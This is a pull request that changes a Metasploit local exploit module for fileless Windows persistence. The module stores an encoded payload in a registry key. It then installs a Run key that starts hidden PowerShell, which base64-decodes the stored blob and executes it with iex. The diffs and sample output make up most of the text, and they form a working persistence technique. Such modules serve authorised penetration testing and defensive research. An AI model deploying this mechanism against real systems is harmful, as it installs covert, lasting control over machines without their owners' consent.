### PR TITLE
Registry only persistence

### DIFF
--- a/modules/exploits/windows/local/registry_persistence.rb
+++ b/modules/exploits/windows/local/registry_persistence.rb
@@ -30,7 +30,7 @@ class Metasploit4 < Msf::Exploit::Local
         ],
       'Platform'       => [ 'win' ],
       'SessionTypes'   => [ 'meterpreter', 'cmd' ],
-      'Targets'          =>
+      'Targets'        =>
         [
           [ 'Automatic', { } ]
         ],

--- a/modules/exploits/windows/local/registry_persistence.rb
+++ b/modules/exploits/windows/local/registry_persistence.rb
@@ -66,7 +66,7 @@ class Metasploit4 < Msf::Exploit::Local
   end
 
   def generate_cmd(root_path, blob_key_name, blob_key_reg)
-    cmd = "%COMSPEC% /b /c start /b /min powershell -w hidden -nop -c \"powershell -nop -w hidden -e (Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}')\"" # There might be a better way to do this.
+    cmd = "%COMSPEC% /b /c start /b /min powershell -nop -w hidden -c \"iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((Get-Item '#{root_path}:#{blob_key_name}').GetValue('#{blob_key_reg}'))))\""
     return cmd
   end
 

--- a/modules/exploits/windows/local/registry_persistence.rb
+++ b/modules/exploits/windows/local/registry_persistence.rb
@@ -165,7 +165,18 @@ class Metasploit4 < Msf::Exploit::Local
     )
   end
 
+  def check
+    unless registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\").include?("PowerShell")
+      return Msf::Exploit::CheckCode::Safe
+    end
+    return Msf::Exploit::CheckCode::Vulnerable
+  end
+
   def exploit
+    unless registry_enumkeys("HKLM\\SOFTWARE\\Microsoft\\").include?("PowerShell")
+      print_warning('Warning: PowerShell does not seem to be available, persistence might fail')
+    end
+
     print_status('Generating payload blob..')
     blob = generate_payload_blob
     print_good("Generated payload, #{blob.length} bytes")

--- a/modules/exploits/windows/local/registry_persistence.rb
+++ b/modules/exploits/windows/local/registry_persistence.rb
@@ -30,7 +30,7 @@ class Metasploit4 < Msf::Exploit::Local
         ],
       'Platform'       => [ 'win' ],
       'SessionTypes'   => [ 'meterpreter', 'cmd' ],
-      'Targets'        =>
+      'Targets'          =>
         [
           [ 'Automatic', { } ]
         ],


### PR DESCRIPTION
(This is my first module, please be gentle.)

I recently created a meterpreter script for achieving persistence while only writing registry keys. I thought it would be a good idea to convert this to an actual exploit module. The benefit of this is that you don't have to store any files on disk, and that  it works with roaming profiles if the HKCU key is used. Thanks to Meatballs for some of his functions in his persistence module :). Example output is as follows:

```
[*] Generating payload blob..
[+] Generated payload, 6484 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\llKA7BsJ
[+] Installed payload blob to HKCU\Software\llKA7BsJ\XDhpx7st
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IWV3TA2E
[*] Clean up Meterpreter RC file: /home/user/.msf4/logs/persistence/10.117.6.127_20150701.3829/10.117.6.127_20150701.3829.rc
```
